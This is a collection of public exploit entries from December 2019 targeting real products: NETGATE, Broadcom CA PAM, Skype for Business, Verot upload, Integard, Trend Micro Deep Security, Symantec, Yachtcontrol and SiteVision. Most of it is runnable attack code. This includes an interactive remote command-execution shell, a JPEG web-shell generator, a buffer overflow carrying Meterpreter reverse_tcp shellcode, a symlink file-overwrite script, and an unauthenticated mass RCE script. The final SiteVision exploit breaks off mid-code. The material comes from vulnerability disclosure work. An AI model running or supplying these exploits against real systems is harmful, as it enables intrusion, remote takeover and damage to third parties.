#Exploit Title: NETGATE Data Backup 3.0.620 - 'NGDatBckpSrv' Unquoted Service Path
#Exploit Author : ZwX
#Exploit Date: 2019-12-04
#Vendor Homepage : http://www.netgate.sk/
#Link Software : http://www.netgate.sk/download/download.php?id=5
#Tested on OS: Windows 7


#Analyze PoC :
==============


C:\Users\ZwX>sc qc NGDatBckpSrv
[SC] QueryServiceConfig réussite(s)

SERVICE_NAME: NGDatBckpSrv
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\NETGATE\Data Backup\DataBackupSrv.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : NETGATE Data Backup Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

#Exploit Title: Amiti Antivirus 25.0.640 - Unquoted Service Path
#Exploit Author : ZwX
#Exploit Date: 2019-12-04
#Vendor Homepage : http://www.netgate.sk/
#Link Software : https://www.netgate.sk/download/download.php?id=11
#Tested on OS: Windows 7


#Analyze PoC :
==============


C:\Users\ZwX>sc qc ScsiAccess
[SC] QueryServiceConfig réussite(s)

SERVICE_NAME: AmitiAvHealth
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\NETGATE\Amiti Antivirus\AmitiAntivirusHealth.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Amiti Antivirus Health Check
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\ZwX>sc qc AmitiAvSrv
[SC] QueryServiceConfig réussite(s)

SERVICE_NAME: AmitiAvSrv
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\NETGATE\Amiti Antivirus\AmitiAntivirusSrv.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Amiti Antivirus Engine Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

# Title: Broadcom CA Privilged Access Manager 2.8.2 - Remote Command Execution
# Author: Peter Lapp
# Date: 2019-12-05
# Vendor: https://techdocs.broadcom.com/us/product-content/recommended-reading/security-notices/ca20180614-01--security-notice-for-ca-privileged-access-manager.html
# CVE: CVE-2018-9021 and CVE-2018-9022
# Tested on: v2.8.2

import urllib2
import urllib
import ssl
import sys
import json
import base64


ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE


def send_command(ip, cmd):
    cmd = urllib.quote_plus(cmd)
    url = 'https://'+ip+'/ajax_cmd.php?cmd=AD_IMPORT&command=add&groupId=123&importID=|'+cmd+'+2>%261||&deviceMode=test'
    request = urllib2.Request(url, None)
    response = urllib2.urlopen(request, context=ctx)
    result = json.load(response)
    return result['responseData']

def get_db_value():
    cmd = "echo select value from configuration_f where name = 'ssl_vpn_network' | mysql -u root uag"
    db_value = send_command(ip,cmd)
    db_value = db_value.split('\n')[1]
    return db_value

def encode_payload(cmd):
    sql_string = "update configuration_f set value='\\';"+cmd+"> /tmp/output;\\'' where name='ssl_vpn_network'"
    cmd = "echo "+base64.b64encode(sql_string)+" | base64 -d | mysql -u root uag "
    return cmd

def restore_sql(value):
    sql_string = "update configuration_f set value='"+value+"' where name='ssl_vpn_network'"
    cmd = "echo "+base64.b64encode(sql_string)+" | base64 -d | mysql -u root uag "
    send_command(ip,cmd)

def main():
    print '''Xceedium Command Execution PoC by Peter Lapp(lappsec)'''

    if len(sys.argv) != 2:
        print "Usage: xceedium_rce.py <target ip>"
        sys.exit()

    global ip
    ip = sys.argv[1]
    print 'Enter commands below. Type exit to quit'

    while True:
        cmd = raw_input('# ')
        if cmd == "exit":
            sys.exit()
        orig_value = get_db_value()
        payload = encode_payload(cmd)
        send_command(ip, payload)
        send_command(ip, 'echo -e openvpn\\n | ncat --send-only 127.0.0.1 2210')
        output = send_command(ip, 'cat /tmp/output')
        print output
        restore_sql(orig_value)



if __name__ == "__main__":
    main()

I. VULNERABILITY
-------------------------
Microsoft Skype for Business External Service Interaction (DNS)
Latest Version

II. CVE REFERENCE
-------------------------
Not Assigned Yet

III. VENDOR
-------------------------
https://www.microsoft.com

IV. TIMELINE
-------------------------
28/11/2019 Vulnerability discovered
03/12/2019 Vendor contacted
04/12/2019 Microsoft replay that “We determined that this behavior is
considered to be by design.”

V. CREDIT
-------------------------
Alphan Yavas from Biznet Bilisim A.S.

VI. DESCRIPTION
-------------------------
Microsoft Skype for Business latest versions affected from external
service interaction(DNS) vulnerability. A remote attacker could force
the vulnerable server to send DNS request to any remote server
attacker wants.

VII. PROOF OF CONCEPT
-------------------------
Affected Component:
Path(inurl): /Dialin/Conference.aspx
Parameter: Username

Login page of Skype for Business affected from external service
interaction (DNS) vulnerability. If username is being sent with
following format victim server will send out DNS queries to xxx
domain.  (xxx is the domain which you want to send request from
server)

username: ssrf.xxx.com\pentest
password: (doesn't matter)

Reference: https://portswigger.net/kb/issues/00300200_external-service-interaction-dns

# Exploit Title: Verot 2.0.3 - Remote Code Execution
# Date: 2019-12-05
# Exploit Author: Jinny Ramsmark
# Vendor Homepage: https://www.verot.net/php_class_upload.htm
# Software Link: https://github.com/verot/class.upload.php
# Version: <=2.0.3
# Tested on: Ubuntu 19.10, PHP 7.3, Apache/2.4.41
# CVE : CVE-2019-19576

<?php
#Title: jpeg payload generator for file upload RCE
#Author: Jinny Ramsmark
#Github: https://github.com/jra89/CVE-2019-19576
#Other: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19576
#Usage: php inject.php
#Output: image.jpg.phar is the file to be used for upload and exploitation

#This script assumes no special transforming is done on the image for this specific CVE.
#It can be modified however for different sizes and so on (x,y vars).

ini_set('display_errors', 1);
error_reporting(E_PARSE);
#requires php, php-gd

$orig = 'image.jpg';
$code = '<?=exec($_GET["c"])?>';
$quality = "85";
$base_url = "http://lorempixel.com";

echo "-=Imagejpeg injector 1.7=-\n";

do
{
    $x = 100;
    $y = 100;
    $url = $base_url . "/$x/$y/";

    echo "[+] Fetching image ($x X $y) from $url\n";
    file_put_contents($orig, file_get_contents($url));
} while(!tryInject($orig, $code, $quality));

echo "[+] It seems like it worked!\n";
echo "[+] Result file: image.jpg.phar\n";

function tryInject($orig, $code, $quality)
{
    $result_file = 'image.jpg.phar';
    $tmp_filename = $orig . '_mod2.jpg';

    //Create base image and load its data
    $src = imagecreatefromjpeg($orig);

    imagejpeg($src, $tmp_filename, $quality);
    $data = file_get_contents($tmp_filename);
    $tmpData = array();

    echo "[+] Jumping to end byte\n";
    $start_byte = findStart($data);

    echo "[+] Searching for valid injection point\n";
    for($i = strlen($data)-1; $i > $start_byte; --$i)
    {
        $tmpData = $data;
        for($n = $i, $z = (strlen($code)-1); $z >= 0; --$z, --$n)
        {
            $tmpData[$n] = $code[$z];
        }

        $src = imagecreatefromstring($tmpData);
        imagejpeg($src, $result_file, $quality);

        if(checkCodeInFile($result_file, $code))
        {
            unlink($tmp_filename);
            unlink($result_file);
            sleep(1);

            file_put_contents($result_file, $tmpData);
            echo "[!] Temp solution, if you get a 'recoverable parse error' here, it means it probably failed\n";

            sleep(1);
            $src = imagecreatefromjpeg($result_file);

            return true;
        }
        else
        {
            unlink($result_file);
        }
    }
        unlink($orig);
        unlink($tmp_filename);
        return false;
}

function findStart($str)
{
    for($i = 0; $i < strlen($str); ++$i)
    {
        if(ord($str[$i]) == 0xFF && ord($str[$i+1]) == 0xDA)
        {
            return $i+2;
        }
    }

    return -1;
}

function checkCodeInFile($file, $code)
{
    if(file_exists($file))
    {
        $contents = loadFile($file);
    }
    else
    {
        $contents = "0";
    }

    return strstr($contents, $code);
}

function loadFile($file)
{
    $handle = fopen($file, "r");
    $buffer = fread($handle, filesize($file));
    fclose($handle);

    return $buffer;
}

Exploit Title: Integard Pro NoJs 2.2.0.9026 - Remote Buffer Overflow
Date: 2019-09-22
Exploit Author: purpl3f0xsecur1ty
Vendor Homepage: https://www.tucows.com/
Software Link: http://www.tucows.com/preview/519612/Integard-Home
Version: Pro 2.2.0.9026 / Home 2.0.0.9021
Tested on: Windows XP / Win7 / Win10
CVE: CVE-2019-16702

#!/usr/bin/python
########################################################
#~Integard Pro 2.2.0.9026 "NoJs" EIP overwrite exploit~#
#~~~~~~~~~~~~~~~~Authored by purpl3f0x~~~~~~~~~~~~~~~~~#
# The vulnerability: Integard fails to sanitize input  #
# to the "NoJs" parameter in an HTTP POST request,     #
# resulting in a stack buffer overflow that overwrites #
# the instruction pointer, leading to remote code      #
# execution.                                           #
########################################################

import socket
import os
import sys
from struct import pack

def main():
    print "~*Integard RCE Exploit for XP/7/10*~"
    print "Chose target: (Enter number only)"
    print "1)  -  Windows XP"
    print "2)  -  Windows 7/10"
    target = str(input())
    host = "10.0.0.130"
    port = 18881

    ####################################################
    # Integard's functionality interferes with reverse #
    # and bind shells. Only Meterpreter seems to work. #
    ####################################################

    # msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.128 LPORT=9001
    # -b "\x00\x26\x2f\x3d\x3f\x5c" -f python -v meterpreter EXITFUNC=thread
    meterpreter =  "\x90" * 50
    meterpreter += "\xda\xcd\xbe\xa2\x51\xce\x97\xd9\x74\x24\xf4"
    meterpreter += "\x5f\x2b\xc9\xb1\x5b\x83\xef\xfc\x31\x77\x15"
    meterpreter += "\x03\x77\x15\x40\xa4\x32\x7f\x06\x47\xcb\x80"
    meterpreter += "\x66\xc1\x2e\xb1\xa6\xb5\x3b\xe2\x16\xbd\x6e"
    meterpreter += "\x0f\xdd\x93\x9a\x84\x93\x3b\xac\x2d\x19\x1a"
    meterpreter += "\x83\xae\x31\x5e\x82\x2c\x4b\xb3\x64\x0c\x84"
    meterpreter += "\xc6\x65\x49\xf8\x2b\x37\x02\x77\x99\xa8\x27"
    meterpreter += "\xcd\x22\x42\x7b\xc0\x22\xb7\xcc\xe3\x03\x66"
    meterpreter += "\x46\xba\x83\x88\x8b\xb7\x8d\x92\xc8\xfd\x44"
    meterpreter += "\x28\x3a\x8a\x56\xf8\x72\x73\xf4\xc5\xba\x86"
    meterpreter += "\x04\x01\x7c\x78\x73\x7b\x7e\x05\x84\xb8\xfc"
    meterpreter += "\xd1\x01\x5b\xa6\x92\xb2\x87\x56\x77\x24\x43"
    meterpreter += "\x54\x3c\x22\x0b\x79\xc3\xe7\x27\x85\x48\x06"
    meterpreter += "\xe8\x0f\x0a\x2d\x2c\x4b\xc9\x4c\x75\x31\xbc"
    meterpreter += "\x71\x65\x9a\x61\xd4\xed\x37\x76\x65\xac\x5f"
    meterpreter += "\xbb\x44\x4f\xa0\xd3\xdf\x3c\x92\x7c\x74\xab"
    meterpreter += "\x9e\xf5\x52\x2c\x96\x11\x65\xe2\x10\x71\x9b"
    meterpreter += "\x03\x61\x58\x58\x57\x31\xf2\x49\xd8\xda\x02"
    meterpreter += "\x75\x0d\x76\x08\xe1\xa4\x87\x0c\x71\xd0\x85"
    meterpreter += "\x0c\x52\x08\x03\xea\xc4\x1a\x43\xa2\xa4\xca"
    meterpreter += "\x23\x12\x4d\x01\xac\x4d\x6d\x2a\x66\xe6\x04"
    meterpreter += "\xc5\xdf\x5f\xb1\x7c\x7a\x2b\x20\x80\x50\x56"
    meterpreter += "\x62\x0a\x51\xa7\x2d\xfb\x10\xbb\x5a\x9c\xda"
    meterpreter += "\x43\x9b\x09\xdb\x29\x9f\x9b\x8c\xc5\x9d\xfa"
    meterpreter += "\xfb\x4a\x5d\x29\x78\x8c\xa1\xac\x49\xe7\x94"
    meterpreter += "\x3a\xf6\x9f\xd8\xaa\xf6\x5f\x8f\xa0\xf6\x37"
    meterpreter += "\x77\x91\xa4\x22\x78\x0c\xd9\xff\xed\xaf\x88"
    meterpreter += "\xac\xa6\xc7\x36\x8b\x81\x47\xc8\xfe\x91\x80"
    meterpreter += "\x36\x7d\xbe\x28\x5f\x7d\xfe\xc8\x9f\x17\xfe"
    meterpreter += "\x98\xf7\xec\xd1\x17\x38\x0d\xf8\x7f\x50\x84"
    meterpreter += "\x6d\xcd\xc1\x99\xa7\x93\x5f\x9a\x44\x08\x6f"
    meterpreter += "\xe1\x25\xaf\x90\x16\x2c\xd4\x90\x17\x50\xea"
    meterpreter += "\xad\xce\x69\x98\xf0\xd3\xcd\x83\xee\xf9\x3b"
    meterpreter += "\x2c\xb7\x68\x86\x31\x48\x47\xc5\x4f\xcb\x6d"
    meterpreter += "\xb6\xab\xd3\x04\xb3\xf0\x53\xf5\xc9\x69\x36"
    meterpreter += "\xf9\x7e\x89\x13"

    if target == "1":
        print "[*] Sending Windows XP payload using meterpreter/reverse_tcp"
        # JMP ESP at 0x3E087557 in iertutil.dll
        crash = "A" * 512
        crash += pack("<L",0x3E087557)
        crash += meterpreter
        crash += "C" * (1500 - len(crash))

        buffer = ""
        buffer += "POST /LoginAdmin HTTP/1.1\r\n"
        buffer += "Host: 10.0.0.130:18881\r\n"
        buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0\r\n"
        buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
        buffer += "Accept-Language: en-US,en;q=0.5\r\n"
        buffer += "Accept-Encoding: gzip, deflate\r\n"
        buffer += "Referer: http://10.0.0.130:18881/\r\n"
        buffer += "Connection: close\r\n"
        buffer += "Upgrade-Insecure-Requests: 1\r\n"
        buffer += "Content-Type: application/x-www-form-urlencoded\r\n"
        buffer += "Content-Length: 78\r\n\r\n"
        buffer += "Password=asdf&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=" + crash + "&LoginButtonName=Login\r\n"

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host,port))
        s.send(buffer)
        s.close()
        print "[*] Done"

    if target == "2":
        print "[*] Sending Windows 7/10 payload using meterpreter/reverse_tcp"

        # ASLR IS ON!!! MUST USE NON-ASLR MODULE!
        # POP POP RET in integard.exe (ASLR disabled)
        nSEH = "\xEB\xD0\x90\x90"   # Jump 48 bytes backwards
        SEH = pack("<L",0x004042B0)

        jumpCall = "\xEB\x09" # Jump 11 bytes forward to hit the CALL in bigBackJump
        bigBackJump = "\x59\xFE\xCD\xFE\xCD\xFE\xCD\xFF\xE1\xE8\xF2\xFF\xFF\xFF"

        crash = "\x90" * (2776 -len(jumpCall) - len(bigBackJump) - len(meterpreter) - 50)
        crash += meterpreter
        crash += "\x90" * 50
        crash += jumpCall
        crash += bigBackJump
        crash += nSEH
        crash += SEH


        buffer = ""
        buffer += "POST /LoginAdmin HTTP/1.1\r\n"
        buffer += "Host: 10.0.0.130:18881\r\n"
        buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0\r\n"
        buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
        buffer += "Accept-Language: en-US,en;q=0.5\r\n"
        buffer += "Accept-Encoding: gzip, deflate\r\n"
        buffer += "Referer: http://10.0.0.130:18881/\r\n"
        buffer += "Connection: close\r\n"
        buffer += "Upgrade-Insecure-Requests: 1\r\n"
        buffer += "Content-Type: application/x-www-form-urlencoded\r\n"
        buffer += "Content-Length: 78\r\n\r\n"
        buffer += "Password=asdf&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=" + crash + "&LoginButtonName=Login\r\n"

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host,port))
        s.send(buffer)
        s.close()
        print "[*] Done"

main()

# Exploit Title: Trend Micro Deep Security Agent 11 - Arbitrary File Overwrite
# Exploit Author : Peter Lapp
# Exploit Date: 2019-12-05
# Vendor Homepage :  https://www.trendmicro.com/en_us/business.html
# Link Software : https://help.deepsecurity.trendmicro.com/software.html?regs=NABU&prodid=1716
# Tested on OS: v11.0.582 and v10.0.3186 on Windows Server 2012 R2, 2008R2, and 7 Enterprise.
# CVE: 2019-15627

# CVE-2019-15627 - Trend Micro Deep Security Agent Local File Overwrite Exploit by Peter Lapp (lappsec)

# This script uses the symboliclink-testing-tools project, written by James Forshaw ( https://github.com/googleprojectzero/symboliclink-testing-tools )
# The vulnerability allows an unprivileged local attacker to delete any file on the filesystem, or overwrite it with abritrary data hosted elsewhere (with limitations)
# This particular script will attempt to overwrite the file dsa_control.cmd with arbitrary data hosted on an external web server, partly disabling TMDS, 
# even when agent self-protection is turned on. It can also be modified/simplified to simply delete the target file, if desired. 

# When TMDS examines javascript it writes snippets of it to a temporary file, which is locked and then deleted almost immediately.
# The names of the temp files are sometimes reused, which allows us to predict the filename and redirect to another file.
# While examining the JS, it generally strips off the first 4096 bytes or so, replaces those with spaces, converts the rest to lowercase and writes it to the temp file. 
# So the attacker can host a "malicious" page that starts with the normal html and script tags, then fill the rest of the ~4096 bytes with garbage, 
# then the payload to be written, then a few hundred trailing spaces (not sure why, but they are needed). The resulting temp file will start with 4096 spaces, 
# and then the lowercase payload. Obviously this has some limitations, like not being able to write binaries, but there are plenty of config files that 
# are ripe for the writing that can then point to a malicious binary.

# Usage:
# 1. First you'd need to host your malicious file somewhere. If you just want to delete the target file or overwrite it with garbage, skip this part. 
# 2. Open a browser (preferrably IE) and start the script
# 3. Browse to your malicious page (if just deleting the target file, browse to any page with javascript).
# 4. Keep refreshing the page until you see the script create the target file overwritten.
#
# It's a pretty dumb/simple script and won't work every time, so if it doesn't work just run it again. Or write a more reliable exploit. 


import time
import os
import subprocess
import sys
import webbrowser
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler

class Stage1_Handler(FileSystemEventHandler):
  def __init__(self):
    self.filenames = []
  def on_created(self, event):
    filename = os.path.basename(event.src_path)
    if filename in self.filenames:
      print ('Starting symlink creation.')
      watcher1.stop()
      symlinkery(self.filenames)
    else:
      self.filenames.append(filename)
      print ('File %s created.') % filename

class Stage2_Handler(FileSystemEventHandler):
  def on_any_event(self, event):
    if os.path.basename(event.src_path) == 'dsa_control.cmd':
      print "Target file overwritten/deleted. Cleaning up."
      subprocess.Popen("taskkill /F /T /IM CreateSymlink.exe", shell=True)
      subprocess.Popen("taskkill /F /T /IM Baitandswitch.exe", shell=True)
      os.system('rmdir /S /Q "C:\\ProgramData\\Trend Micro\\AMSP\\temp\\"')
      os.system('rmdir /S /Q "C:\\test"')
      os.rename('C:\\ProgramData\\Trend Micro\\AMSP\\temp-orig','C:\\ProgramData\\Trend Micro\\AMSP\\temp')
      watcher2.stop()
      sys.exit(0)

class Watcher(object):
  def __init__(self, event_handler, path_to_watch):
    self.event_handler = event_handler
    self.path_to_watch = path_to_watch
    self.observer = Observer()
  def run(self):
    self.observer.schedule(self.event_handler(), self.path_to_watch)
    self.observer.start()
    try:
      while True:
        time.sleep(1)
    except KeyboardInterrupt:
      self.observer.stop()

    self.observer.join()
  def stop(self):
    self.observer.stop()

def symlinkery(filenames):
  print "Enter symlinkery"
  for filename in filenames:
    print "Creating symlink for %s" % filename
    cmdname = "start cmd /c CreateSymlink.exe \"C:\\test\\virus\\%s\" \"C:\\test\\test\\symtarget\"" % filename
    subprocess.Popen(cmdname, shell=True)
  os.rename('C:\\ProgramData\\Trend Micro\\AMSP\\temp','C:\\ProgramData\\Trend Micro\\AMSP\\temp-orig')
  os.system('mklink /J "C:\\ProgramData\\Trend Micro\\AMSP\\temp" C:\\test')
  watcher2.run()
  print "Watcher 2 started"

try:
        os.mkdir('C:\\test')
except:
        pass

path1 = 'C:\\ProgramData\\Trend Micro\\AMSP\\temp\\virus'
path2 = 'C:\\Program Files\\Trend Micro\\Deep Security Agent\\'
watcher1 = Watcher(Stage1_Handler,path1)
watcher2 = Watcher(Stage2_Handler,path2)
switcheroo = "start cmd /c BaitAndSwitch.exe C:\\test\\test\\symtarget \"C:\\Program Files\\Trend Micro\\Deep Security Agent\\dsa_control.cmd\" \"C:\\windows\\temp\\deleteme.txt\" d"
subprocess.Popen(switcheroo, shell=True)
watcher1.run()

Advisory
A malicious application can take advantage of a vulnerability in Symantec Endpoint Protection to leak privileged information and/or execute code with higher privileges, thus taking full control over the affected host.

Products Affected
Symantec Endpoint Protection v14.x < v14.2 (RU1)
Symantec Endpoint Protection v12.x < 12.1 (RU6 MP10)
Symantec Endpoint Protection Small Business Edition v12.x < 12.1 (RU6 MP10c)

https://support.symantec.com/us/en/article.SYMSA1487.html
https://labs.nettitude.com/blog/cve-2019-12750-symantec-endpoint-protection-local-privilege-escalation-part-1/

Timeline
Date of discovery: April 2019
Vendor informed: 18 April 2019
Vendor Acknowledged: 19 April 2019
Vendor Requested Extra Time: 19 April 2019
Advisory [1]: 31 July 2019
Nettitude blog [2]: 5 December 2019

References

1.       https://support.symantec.com/us/en/article.SYMSA1487.html

2.       https://labs.nettitude.com/blog/cve-2019-12750-symantec-endpoint-protection-local-privilege-escalation-part-1/

Kyriakos Economou
Senior Vulnerability Researcher


T: 0345 520 0085

E: keconomou@nettitude.com


UK: 1 Jephson Court, Tancred Cl, Leamington Spa, CV31 3RZ

[cid:image002.png@01D5AC18.B5AAA630]



                                                                               [Facebook icon] <https://en-gb.facebook.com/Nettitude/>    [LinkedIn icon] <https://www.linkedin.com/company/nettitude-group>    [Twitter icon] <https://twitter.com/Nettitude_group>    [Youtbue icon] <https://www.youtube.com/channel/UCRUUESU5OTfRte0P-pm2MZQ>
















___________________________________________________________________________________
Lloyd’s Register and variants of it are trading names of Lloyd’s Register Group Limited, its subsidiaries and affiliates. 
Nettitude Limited, registered in England, registered number 4705154
Registered office: 1 Jephson Court, Tancred Close, Leamington Spa, Warwickshire, CV31 3RZ. A member of the Lloyd’s Register group.

Lloyd’s Register Group Limited, its affiliates and subsidiaries and their respective officers, employees or agents are individually and collectively, referred to in this clause as ‘Lloyd’s Register’. Lloyd’s Register assumes no responsibility and shall not be liable to any person for any loss, damage or expense caused by reliance on the information or advice in this document or howsoever provided, unless that person has signed a contract with the relevant Lloyd’s Register entity for the provision of this information or advice and in that case any responsibility or liability is exclusively on the terms and conditions set out in that contract. 
___________________________________________________________________________________

# Exploit Title: Yachtcontrol Webapplication - Unauthenticated Remote Code Execution
# Google Dork: N/A
# Date: 2019-12-06
# Exploit Author: Hodorsec
# Vendor Homepage: http://www.yachtcontrol.nl/en/
# Software Link: http://download.yachtcontrol.nl/klant/Software/ & http://download.yachtcontrol.nl/klant/Firmware/
# Versions: Yachtcontrol webapplication through versions dated on 2019-10-06
# Tested on: Yachtcontrol webservers disclosed via Dutch GPRS/4G mobile IP-ranges. IP addresses vary due to DHCP client leasing of telco's.
# CVE: CVE-2019-17270
# 
# Description Product:
# Yachtcontrol software is being used for controlling several aspects on yachts, as the name implies. Having access to the webapplication, 
# it's possible to control several items such as lights, powergenerator, solarcontrol, airco, wipers, heating and other components. 
# Websoftware is built in PHP and mostly runs on a Linux based firmware device, controlling several other components related to the Yacht.
# Other related software running on the same firmware device are custom compiled ELF binaries for controlling related onboard devices.
#
# Description Vulnerability: 
# It's possible to perform direct Operating System commands as an unauthenticated user via the "/pages/systemcall.php?command={COMMAND}"
# page and parameter, where {COMMAND} will be executed and returning the results to the client. 
# 
# Affected Components:
# Yachtcontrol webservers using the custom PHP webapplication, versions until 2019-10-06.

#!/usr/bin/python
import sys,os,requests

# Check arguments
if len(sys.argv) != 5:
    print "Error: enter at least one IP/FQDN as argument. Exiting..."
    print "\nUsage: " + sys.argv[0] + " {IP/FQDN} {PORT} {PROTO} {COMMAND}\n"
    exit(0)

# Parameters
host = sys.argv[1]
port = sys.argv[2]
proto = sys.argv[3]
command = sys.argv[4]
timeout = 10
isFile = False

# Check for file or single IP/FQDN
if os.path.isfile(host):
    isFile = True
    with open(host) as f:
        targets = f.readlines()

# Vulnerable page
page = "/pages/systemcall.php?command="

# HTTP or HTTPS
if proto == "http":
    proto = "http://"
elif proto == "https":
    proto = "https://"
else:
    print "\nInvalid method given: enter http or https\n"
    exit(0)

# Do the request
if isFile:
    for host in targets:
        target = host.strip()
        print target
        try:
            response = requests.get(proto + target + ":" + port + page + command, verify=False, timeout=timeout)
            print(response.content.replace('executing command: ' + command,''))
        except requests.exceptions.Timeout:
            print "Timed out."
            pass
        except requests.exceptions.RequestException as e:
            print "Host not found."
            pass
else:
    try:
        response = requests.get(proto + host + ":" + port + page + command, verify=False, timeout=timeout)
        print(response.content.replace('executing command: ' + command,''))
    except requests.exceptions.Timeout:
        print "Timed out."
        pass
    except requests.exceptions.RequestException as e:
        print "Host not found."
        pass

#  Disclosure Timeline using CERT/CC disclosure policy:
#  - 06-10-19: Requested CVE
#  - 06-10-19: Contacted vendor for initial contact, used several publicly known mailaddresses
#  - 12-10-19: Sent reminder due to no response
#  - 06-11-19: Sent second reminder due to no response
#  - 08-11-19: Received response requesting information, sent information
#  - 11-11-19: Correspondence concerning vulnerability
#  - 25-11-19: Sent reminder of publishing PoC to vendor, received response
#  - 05-12-19: Sent final reminder of publishing PoC to vendor
#  - 06-12-19: Public Disclosure

# SiteVision Insufficient Module Access Control

CVE-2019-12734
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12734
https://www.cybercom.com/About-Cybercom/Blogs/Security-Advisories/high-risk-vulnerabilities-in-cms-product/


## Summary
Attackers may inject non-authorised modules when editing pages using a low-privilege account, leading to impacts ranging from Cross-Site Scripting to Remote Code Execution.


## Vendor Description
SiteVision AB is a Swedish product company focused on developing the portal and web publishing platform SiteVision.


## Affected Versions
All versions of SiteVision 4 until 4.5.6.
All versions of SiteVision 5 until 5.1.1.
Earlier major versions are assumed to be vulnerable.


## Technical Details
This vulnerability allows remote code execution as described in CVE-2019-12733.

Modules are basic building blocks in SiteVision pages and templates; they can feature display content such as headings and paragraphs, social functions and commenting, raw HTML, or server-side scripts.

The SiteVision application does not sufficiently assert whether or not the current user is authorised to add a specific module type to the current page, allowing attackers with low-privilege to add hostile content. This can trivially be reproduced by adding a paragraph text module, and changing "text" to "html" (or any other type) in the outgoing HTTP request. The application does not check whether or not the user is authorised to add the requested module; it relies on the fact that the user interface does not expose a button for it.

Reproduced on SiteVision 4 and 5; the following steps applies to SiteVision 5:

1. Install SiteVision and either create or import a new site.
2. Set up and create an Editor ("Redaktör") user.
3. Log on as the new low-privilege user.
4. Create a new page and note how only basic modules are available.
5. Insert a text module.
6. Re-send the HTTP request generated in step #5, but change the value of portletType from "text" to "html". The following is the resulting request for our demo environment:

```
POST /edit-api/1/4.549514a216b1c6180f41c3/4.549514a216b1c6180f41c3/portlet HTTP/1.1
Host: fast.furious
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en
Accept-Encoding: gzip, deflate
Referer: http://fast.furious/edit/4.549514a216b1c6180f41c3
Content-Type: application/json; charset=utf-8
X-CSRF-Token: [...]
X-Requested-With: XMLHttpRequest
Content-Length: 70
Connection: close
Cookie: [...]

{"portletType":"html","relativeElement":"12.549514a216b1c6180f41d0"}
```

7. Edit the HTML module and inject any JavaScript payload such as `<script>alert(1)</script>`.
8. Under "Other" check "Show in edit mode".
9. Press "OK".
10. Note the alert pop-up, indicating that the injected JavaScript was executed.


## Vulnerability Disclosure Timeline
2019-06-03 - Disclosed to vendor
2019-06-04 - Vendor confirms vulnerability
2019-09-26 - Vendor issues patches
2019-12-04 - Public disclosure

Oscar Hjelm
Cybercom Sweden

# SiteVision Remote Code Execution

CVE-2019-12733
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12733
https://www.cybercom.com/About-Cybercom/Blogs/Security-Advisories/high-risk-vulnerabilities-in-cms-product/


## Summary
Attackers may execute arbitrary code as root on the target server after gaining access to a low-privilege account.


## Vendor Description
SiteVision AB is a Swedish product company focused on developing the portal and web publishing platform SiteVision.


## Affected Versions
All versions of SiteVision 4 until 4.5.6.
All versions of SiteVision 5 until 5.1.1.
Earlier major versions are assumed to be vulnerable.


## Technical Details
The SiteVision application does not sufficiently validate whether or not the current user is permitted to add or edit modules of the "script" type. This means that a low-privilege user such as an Editor ("Redaktör") can inject a new script module, or edit an existing one, and leverage it to execute arbitrary code.

The access control flaw allowing users to inject non-authorized modules are described separately in CVE-2019-12734.

While the scripts are written in JavaScript, the environment allows the developer to reach and import Java APIs.

Reproduced on SiteVision 4 and 5; the following steps applies to SiteVision 5:

1. Install SiteVision and either create or import a new site.
2. Set up and create an Editor ("Redaktör") user.
3. Log on as the new low-privilege user.
4. Create a new page and note how only basic modules are available.
5. Insert a text module.
6. Re-send the HTTP request generated in step #5, but change the value of portletType from "text" to "script". The following is the resulting request for our demo environment:

```
POST /edit-api/1/4.549514a216b1c6180f41c3/4.549514a216b1c6180f41c3/portlet HTTP/1.1
Host: fast.furious
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en
Accept-Encoding: gzip, deflate
Referer: http://fast.furious/edit/4.549514a216b1c6180f41c3
Content-Type: application/json; charset=utf-8
X-CSRF-Token: [...]
X-Requested-With: XMLHttpRequest
Content-Length: 70
Connection: close
Cookie: [...]

{"portletType":"script","relativeElement":"12.549514a216b1c6180f41d0"}
```

7. Issue the modified request to the application.
8. Reload the current page and note how it now contains a script module.
9. Edit the script module to contain the following JavaScript code:

```
const app = (() => {
'use strict';

   importPackage(java.io);
   importPackage(java.lang);

   const init = () => {
  var result = [];

  var p = Runtime.getRuntime().exec("whoami");
